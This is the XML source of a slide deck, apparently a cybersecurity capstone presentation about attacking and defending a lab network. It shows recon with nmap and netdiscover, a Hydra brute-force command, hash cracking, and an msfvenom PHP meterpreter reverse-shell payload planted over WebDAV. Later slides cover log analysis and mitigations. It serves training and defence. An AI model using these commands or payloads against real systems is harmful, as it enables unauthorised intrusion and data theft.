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 Thin"/>
      <p:regular r:id="rId30"/>
      <p:bold r:id="rId31"/>
      <p:italic r:id="rId32"/>
      <p:boldItalic r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium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8C46BC-E163-47BB-806C-5A0D32DE7C0A}">
  <a:tblStyle styleId="{D98C46BC-E163-47BB-806C-5A0D32DE7C0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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Robot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bold.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium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6" name="Google Shape;10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3" name="Google Shape;1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0" name="Google Shape;119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2" name="Google Shape;120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2" name="Google Shape;12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9" name="Google Shape;12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5" name="Google Shape;123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3" name="Google Shape;12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1" name="Google Shape;125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9" name="Google Shape;12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5" name="Google Shape;105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3" name="Google Shape;106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d9e79ea8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d9e79ea8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9" name="Google Shape;11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2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86" name="Google Shape;86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88" name="Google Shape;88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1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3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="138" r="148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3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" name="Google Shape;10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07" name="Google Shape;10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3" name="Google Shape;123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6" name="Google Shape;126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7" name="Google Shape;127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" name="Google Shape;128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39" name="Google Shape;13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47" name="Google Shape;147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8" name="Google Shape;148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8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 rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="209" r="208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19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="504" r="503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7" name="Google Shape;167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8" name="Google Shape;16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" name="Google Shape;169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75" name="Google Shape;175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" name="Google Shape;176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7" name="Google Shape;177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79" name="Google Shape;179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0" name="Google Shape;18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3" name="Google Shape;183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6" name="Google Shape;186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7" name="Google Shape;187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" name="Google Shape;188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89" name="Google Shape;189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5" name="Google Shape;15;p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" name="Google Shape;202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4" name="Google Shape;204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5" name="Google Shape;205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06" name="Google Shape;206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7" name="Google Shape;20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8" name="Google Shape;20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9" name="Google Shape;209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0" name="Google Shape;210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1" name="Google Shape;211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3" name="Google Shape;213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6" name="Google Shape;21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9" name="Google Shape;219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4" name="Google Shape;224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25" name="Google Shape;225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34" name="Google Shape;234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5" name="Google Shape;235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6" name="Google Shape;236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38" name="Google Shape;238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9" name="Google Shape;23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2" name="Google Shape;242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4" name="Google Shape;24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7" name="Google Shape;247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8" name="Google Shape;24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0" name="Google Shape;250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" name="Google Shape;251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2" name="Google Shape;25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" name="Google Shape;254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6" name="Google Shape;25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7" name="Google Shape;25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" name="Google Shape;258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9" name="Google Shape;259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0" name="Google Shape;26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" name="Google Shape;262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4" name="Google Shape;264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5" name="Google Shape;265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6" name="Google Shape;266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0" name="Google Shape;27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71" name="Google Shape;27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2" name="Google Shape;27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75" name="Google Shape;275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6" name="Google Shape;27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9" name="Google Shape;279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4" name="Google Shape;284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5" name="Google Shape;285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9" name="Google Shape;289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0" name="Google Shape;290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" name="Google Shape;291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3" name="Google Shape;293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7" name="Google Shape;29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0" name="Google Shape;300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1" name="Google Shape;301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08" name="Google Shape;30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9" name="Google Shape;30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" name="Google Shape;31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1" name="Google Shape;31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12" name="Google Shape;312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3" name="Google Shape;31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" name="Google Shape;315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6" name="Google Shape;316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7" name="Google Shape;317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8" name="Google Shape;31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9" name="Google Shape;31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1" name="Google Shape;321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2" name="Google Shape;322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3" name="Google Shape;32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" name="Google Shape;326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8" name="Google Shape;32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9" name="Google Shape;32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3" name="Google Shape;33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" name="Google Shape;33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5" name="Google Shape;335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" name="Google Shape;336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7" name="Google Shape;337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8" name="Google Shape;338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2" name="Google Shape;342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3" name="Google Shape;343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" name="Google Shape;344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" name="Google Shape;348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9" name="Google Shape;349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3" name="Google Shape;353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5" name="Google Shape;35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" name="Google Shape;35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" name="Google Shape;357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" name="Google Shape;359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0" name="Google Shape;36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" name="Google Shape;36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" name="Google Shape;362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" name="Google Shape;363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5" name="Google Shape;36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" name="Google Shape;36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" name="Google Shape;369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0" name="Google Shape;37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1" name="Google Shape;37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2" name="Google Shape;372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" name="Google Shape;373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4" name="Google Shape;374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5" name="Google Shape;37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6" name="Google Shape;37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7" name="Google Shape;377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9" name="Google Shape;379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0" name="Google Shape;38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1" name="Google Shape;38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2" name="Google Shape;382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4" name="Google Shape;384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5" name="Google Shape;385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6" name="Google Shape;386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7" name="Google Shape;387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" name="Google Shape;388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0" name="Google Shape;390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1" name="Google Shape;391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2" name="Google Shape;392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" name="Google Shape;395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6" name="Google Shape;396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7" name="Google Shape;397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" name="Google Shape;398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9" name="Google Shape;399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" name="Google Shape;400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2" name="Google Shape;40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4" name="Google Shape;404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" name="Google Shape;405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6" name="Google Shape;406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7" name="Google Shape;40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1" name="Google Shape;411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2" name="Google Shape;41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4" name="Google Shape;414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" name="Google Shape;415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7" name="Google Shape;41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8" name="Google Shape;41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0" name="Google Shape;420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1" name="Google Shape;421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2" name="Google Shape;42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3" name="Google Shape;42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5" name="Google Shape;425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6" name="Google Shape;426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7" name="Google Shape;42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8" name="Google Shape;42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0" name="Google Shape;430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2" name="Google Shape;432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3" name="Google Shape;433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5" name="Google Shape;435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6" name="Google Shape;436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7" name="Google Shape;437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8" name="Google Shape;438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2" name="Google Shape;442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43" name="Google Shape;44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5" name="Google Shape;445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6" name="Google Shape;446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47" name="Google Shape;447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8" name="Google Shape;448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9" name="Google Shape;449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" name="Google Shape;450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2" name="Google Shape;452;p27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53" name="Google Shape;453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" name="Google Shape;454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27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7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57" name="Google Shape;457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8" name="Google Shape;458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" name="Google Shape;459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0" name="Google Shape;460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65" name="Google Shape;46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6" name="Google Shape;46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8" name="Google Shape;46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9" name="Google Shape;469;p28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8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8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8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8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8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5" name="Google Shape;475;p28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8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8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8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8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8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1" name="Google Shape;481;p28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2" name="Google Shape;482;p28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8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8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5" name="Google Shape;485;p28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6" name="Google Shape;486;p28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8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8" name="Google Shape;488;p28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2" name="Google Shape;492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93" name="Google Shape;493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5" name="Google Shape;495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6" name="Google Shape;496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7" name="Google Shape;497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2" name="Google Shape;502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3" name="Google Shape;503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04" name="Google Shape;504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9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3" name="Google Shape;513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6" name="Google Shape;516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7" name="Google Shape;517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1" name="Google Shape;521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23" name="Google Shape;523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0" name="Google Shape;530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31" name="Google Shape;531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2" name="Google Shape;532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3" name="Google Shape;533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4" name="Google Shape;534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5" name="Google Shape;535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0" name="Google Shape;540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42" name="Google Shape;542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9" name="Google Shape;549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50" name="Google Shape;550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2" name="Google Shape;552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3" name="Google Shape;553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4" name="Google Shape;554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5" name="Google Shape;555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0" name="Google Shape;560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61" name="Google Shape;561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8" name="Google Shape;568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69" name="Google Shape;569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0" name="Google Shape;570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1" name="Google Shape;57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2" name="Google Shape;57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3" name="Google Shape;573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8" name="Google Shape;578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9" name="Google Shape;579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0" name="Google Shape;580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591" name="Google Shape;591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3" name="Google Shape;593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5" name="Google Shape;595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6" name="Google Shape;596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0" name="Google Shape;600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1" name="Google Shape;601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2" name="Google Shape;602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04" name="Google Shape;604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2" name="Google Shape;612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3" name="Google Shape;613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6" name="Google Shape;616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7" name="Google Shape;617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8" name="Google Shape;618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2" name="Google Shape;622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3" name="Google Shape;623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4" name="Google Shape;624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4" name="Google Shape;634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35" name="Google Shape;635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6" name="Google Shape;636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7" name="Google Shape;637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9" name="Google Shape;639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0" name="Google Shape;640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4" name="Google Shape;644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5" name="Google Shape;645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6" name="Google Shape;646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6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="464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6" name="Google Shape;65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57" name="Google Shape;65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9" name="Google Shape;65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0" name="Google Shape;66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1" name="Google Shape;66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8" name="Google Shape;66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9" name="Google Shape;66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0" name="Google Shape;67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1" name="Google Shape;67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7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="237" l="0" r="0" t="227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1" name="Google Shape;68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82" name="Google Shape;68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4" name="Google Shape;68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5" name="Google Shape;68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7" name="Google Shape;68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5" name="Google Shape;69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6" name="Google Shape;69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6" name="Google Shape;70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07" name="Google Shape;70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8" name="Google Shape;70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9" name="Google Shape;70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0" name="Google Shape;71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1" name="Google Shape;71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2" name="Google Shape;71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8" name="Google Shape;71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9" name="Google Shape;71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0" name="Google Shape;72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1" name="Google Shape;73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32" name="Google Shape;73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3" name="Google Shape;73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4" name="Google Shape;73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5" name="Google Shape;73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6" name="Google Shape;736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7" name="Google Shape;737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4" name="Google Shape;744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5" name="Google Shape;745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6" name="Google Shape;746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40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119" l="0" r="0" t="118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" name="Google Shape;34;p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57" name="Google Shape;75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8" name="Google Shape;75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0" name="Google Shape;76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1" name="Google Shape;76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2" name="Google Shape;76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4" name="Google Shape;76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6" name="Google Shape;76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8" name="Google Shape;76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0" name="Google Shape;77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2" name="Google Shape;77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74" name="Google Shape;77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1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1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1389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4" name="Google Shape;78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785" name="Google Shape;78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6" name="Google Shape;78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7" name="Google Shape;78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9" name="Google Shape;78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0" name="Google Shape;79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2" name="Google Shape;79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4" name="Google Shape;79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6" name="Google Shape;79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8" name="Google Shape;79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0" name="Google Shape;80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02" name="Google Shape;802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2" name="Google Shape;81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13" name="Google Shape;81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4" name="Google Shape;81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5" name="Google Shape;81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6" name="Google Shape;81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0" name="Google Shape;82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2" name="Google Shape;82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4" name="Google Shape;82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6" name="Google Shape;82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8" name="Google Shape;82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30" name="Google Shape;830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3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2891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0" name="Google Shape;840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41" name="Google Shape;841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2" name="Google Shape;842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3" name="Google Shape;843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4" name="Google Shape;844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6" name="Google Shape;846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8" name="Google Shape;848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0" name="Google Shape;850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4" name="Google Shape;854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6" name="Google Shape;856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58" name="Google Shape;858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4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4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1615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7" name="Google Shape;867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68" name="Google Shape;868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9" name="Google Shape;869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0" name="Google Shape;870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1" name="Google Shape;871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2" name="Google Shape;872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4" name="Google Shape;874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6" name="Google Shape;876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8" name="Google Shape;878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2" name="Google Shape;882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4" name="Google Shape;884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6" name="Google Shape;886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88" name="Google Shape;88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5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1036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8" name="Google Shape;89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899" name="Google Shape;89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0" name="Google Shape;90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1" name="Google Shape;90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2" name="Google Shape;90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9" name="Google Shape;90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1" name="Google Shape;91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3" name="Google Shape;91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5" name="Google Shape;91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7" name="Google Shape;91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19" name="Google Shape;91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9" name="Google Shape;92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30" name="Google Shape;93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1" name="Google Shape;93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2" name="Google Shape;93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3" name="Google Shape;93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0" name="Google Shape;94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2" name="Google Shape;94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4" name="Google Shape;94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6" name="Google Shape;94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8" name="Google Shape;94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50" name="Google Shape;950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0" name="Google Shape;96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961" name="Google Shape;96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3" name="Google Shape;96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4" name="Google Shape;96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1" name="Google Shape;97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3" name="Google Shape;97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5" name="Google Shape;97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7" name="Google Shape;97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9" name="Google Shape;97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81" name="Google Shape;981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8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1275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49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="59" l="0" r="0" t="58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49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2" name="Google Shape;992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994" name="Google Shape;9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49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49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1" name="Google Shape;1001;p5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" name="Google Shape;39;p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" name="Google Shape;41;p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" name="Google Shape;45;p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b="0" i="0" sz="21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" name="Google Shape;47;p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8" name="Google Shape;100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52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0" name="Google Shape;1010;p52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" name="Google Shape;56;p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9" name="Google Shape;5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0" name="Google Shape;60;p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6" name="Google Shape;66;p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69" name="Google Shape;69;p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6" name="Google Shape;76;p1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79" name="Google Shape;79;p1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Inc.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Relationship Id="rId5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Relationship Id="rId4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100"/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Weak Hashed and Without Salt </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1129" name="Google Shape;112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30" name="Google Shape;1130;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="550925" y="994650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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652175" y="785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Crackstation- crack password hashes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2" name="Google Shape;1132;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="478856" y="533702"/>
            <a:ext cx="533372" cy="582780"/>
            <a:chOff x="457200" y="1090715"/>
            <a:chExt cx="695400" cy="759718"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1133" name="Google Shape;1133;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1090715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4" name="Google Shape;1134;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="166180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5" name="Google Shape;1135;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3095781" y="533702"/>
            <a:ext cx="533372" cy="681370"/>
            <a:chOff x="357884" y="1090715"/>
            <a:chExt cx="695400" cy="888241"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1136" name="Google Shape;1136;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="357884" y="1090715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535419" y="1712009"/>
              <a:ext cx="340319" cy="266947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8" name="Google Shape;1138;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3431050" y="904800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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3431050" y="785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Was able to crack ryans hash and sign in their WebDAV server. Gained access to /secret_folder. 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0" name="Google Shape;11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75" y="2623650"/>
            <a:ext cx="6458875" cy="25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1" name="Google Shape;114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00" y="2184847"/>
            <a:ext cx="9144001" cy="773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Exploitation: [MSFVenom with LFI vulnerability]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1147" name="Google Shape;114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48" name="Google Shape;1148;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="684200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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762375" y="533700"/>
            <a:ext cx="23619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Msfvenom to create the payload and msfconsole to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deliver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the payload on the capstone server.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#msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4444 -f raw &gt; shell.php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0" name="Google Shape;1150;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="190906" y="740402"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1151" name="Google Shape;1151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2" name="Google Shape;1152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3" name="Google Shape;1153;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3162381" y="684202"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1154" name="Google Shape;1154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5" name="Google Shape;1155;p64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="812268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6" name="Google Shape;1156;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3830525" y="684200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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3830525" y="684200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Created and planted a reverse shell as Ryans. Flag was discovered once the payload was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executed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and it began listening.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58" name="Google Shape;115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625" y="2551275"/>
            <a:ext cx="4678651" cy="247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650" y="3700474"/>
            <a:ext cx="4759899" cy="121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4700" y="2135050"/>
            <a:ext cx="4341097" cy="28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5" name="Google Shape;116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66" name="Google Shape;1166;p65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67" name="Google Shape;1167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73" name="Google Shape;1173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.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74" name="Google Shape;117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75" name="Google Shape;1175;p66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Scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> May 12 2021 during 00:30-01:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>00 hrs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> with over 2500 connections. The source ip was 192.168.1.90(Kali). The spike in network traffic indicates this was a port scan.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1176" name="Google Shape;117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50" y="1467775"/>
            <a:ext cx="5597276" cy="343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84" name="Google Shape;118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85" name="Google Shape;1185;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3980150" y="806152"/>
            <a:ext cx="59034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There was 36,650 requests made around 19:00-20:00 to access the /secret_folder. The /secret_folder has a hash to access system.  They were an alarming 36,000 401 http status code responses. Only 3 of requests were 301 status code.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1186" name="Google Shape;11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7975" y="6761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575" y="1945575"/>
            <a:ext cx="4863070" cy="297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3" name="Google Shape;1193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194" name="Google Shape;1194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95" name="Google Shape;1195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36657 requests were made in the attack to access the secret folder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36650 returned 401 codes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 attempts went through</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1196" name="Google Shape;119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6325" y="1359450"/>
            <a:ext cx="4698396" cy="28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611924"/>
            <a:ext cx="3510651" cy="3152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6313" y="2351900"/>
            <a:ext cx="4439312" cy="270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05" name="Google Shape;1205;p69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1206" name="Google Shape;1206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07" name="Google Shape;1207;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1420375" y="835125"/>
            <a:ext cx="57912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263 requests were made to /webdav directory</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="3200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file requested was shell2.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1208" name="Google Shape;1208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375" y="9868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613" y="1992113"/>
            <a:ext cx="4244075" cy="2571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70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6" name="Google Shape;1216;p7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22" name="Google Shape;1222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23" name="Google Shape;1223;p71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Set an alarm to activate when there are over 500 connections </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>occurring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> within an hour.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24" name="Google Shape;1224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Request a break between each port scan.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Update Firewall settings and policies periodically.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30" name="Google Shape;1230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1" name="Google Shape;1231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Unauthorized access to access folders must be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>prevented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> with an alarm set to respond when 5 or more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>attempts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> occur.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The alarm should trigger when anyone other than 192.168.1.105 tries to requests for hidden folders.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32" name="Google Shape;1232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Encrypt company data. Modify windows host file.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Reorganize folders and data. Restrict  public access of those folders.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b="0" i="0" lang="en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38" name="Google Shape;1238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39" name="Google Shape;1239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Setting an alarm that would respond when a http 401 status code  has been detected.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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>threshold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> would be 5-7 failed login attempts within the hour.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40" name="Google Shape;1240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Having account lockout to automatically take place once a user attempts 6 failed logins.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Two-factor authentication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Make users create complex and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>difficult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> passwords in order to reduce the chances of easily cracking it.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Detecting the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1246" name="Google Shape;124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47" name="Google Shape;1247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Have a whitelisted Ip Address list that can access company folders.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Set alarm to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>activate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> when any IP address tries accessing webdav that isn’t on the whitelist. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>threshold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> would be set to trigger when a HTTP GET/PUT/POST request is made.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48" name="Google Shape;1248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Meterpreter uses port 4444 by default so filtering the destination port.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Only trusted IP address can access the webdav folder.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Update firewall security settings and policies to prevent all other access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% iptables -I INPUT -s 192.168.1.105 -p tcp -m multiport -- d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> 4444 -j accept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54" name="Google Shape;1254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255" name="Google Shape;1255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One strategy would be to Set alarms that trigger when 1 or more php are uploaded. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threshold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> would be set at 1 when files are uploaded on the WEBdav server.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Set alerts to trigger when someone tries accessing port 4444.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Request a break between each port scan.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sp>
        <p:nvSpPr>
          <p:cNvPr id="1256" name="Google Shape;1256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Ports opened should be the necessary ports, close all other ports.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R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>educe php upload by changing permissions for Webdav folders  to only have certain privileges.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/>
              <a:t>Blocking IP Addresses. </a:t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.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1170775" y="683850"/>
            <a:ext cx="1814100" cy="40827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Range: 192.168.1.0/24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 255.255.255.0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 192.168.1.1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 Hyper-V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OS:Windows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Azure Hyper-V ML-RefVm-684427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IPv4:192.168.1.90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 2.6.32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Kali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Elk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IPv4:192.168.1.105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 Linux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 Capstone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54850" y="491670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600" y="686100"/>
            <a:ext cx="3254526" cy="407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identified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{D98C46BC-E163-47BB-806C-5A0D32DE7C0A}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Hyper-V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Host-Cloud VM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192.168.1.00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Network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Monitoring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Victim Machine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{D98C46BC-E163-47BB-806C-5A0D32DE7C0A}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 sz="1400" u="none" cap="none" strike="noStrike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Vulnerability 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i="1"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Ports such as 80 and 4444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Open access for anyone using those ports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Company data can easily be found.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WebDav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Remote Access to WebDAV server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remote access to their webpage contents.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Hashed Password/Weak Password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Password without salt can be cracked. Weak passwords can be brute forced.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Once cracked, attacker can see the password and access their files and data.</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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Apache Directory Listing CVE-2007-0450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#netdiscover -r 192.168.1.255/16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#nmap -sV 192.168.1.1-105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#nmap -sS -A 192.168.1.105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#wget 192.168.1.105 /meet_our_team/ashton.txt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2" name="Google Shape;1092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3" name="Google Shape;109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4" name="Google Shape;109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Discovered all directories and file locations.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discovered files on meet_our_team/ashton.txt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ashton.txt allowed the discovery of the secret folder at /company_folders/secret_folder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0" name="Google Shape;1100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1" name="Google Shape;110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5" name="Google Shape;11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25" y="711662"/>
            <a:ext cx="3549126" cy="372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6" name="Google Shape;110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213" y="3770299"/>
            <a:ext cx="3063425" cy="1182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Exploitation: Brute Force Password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="14213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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="139225" y="142137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Hydra- an bruteforce login cracker.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Command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%hydra -l ashton -P /usr/share/wordlists/rockyou.txt.gz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5" name="Google Shape;1115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6" name="Google Shape;1116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7" name="Google Shape;1117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8" name="Google Shape;1118;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2510725" y="757900"/>
            <a:ext cx="533372" cy="533482"/>
            <a:chOff x="382714" y="1378810"/>
            <a:chExt cx="695400" cy="695453"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1119" name="Google Shape;1119;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="382714" y="1378810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0" name="Google Shape;1120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1" name="Google Shape;1121;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
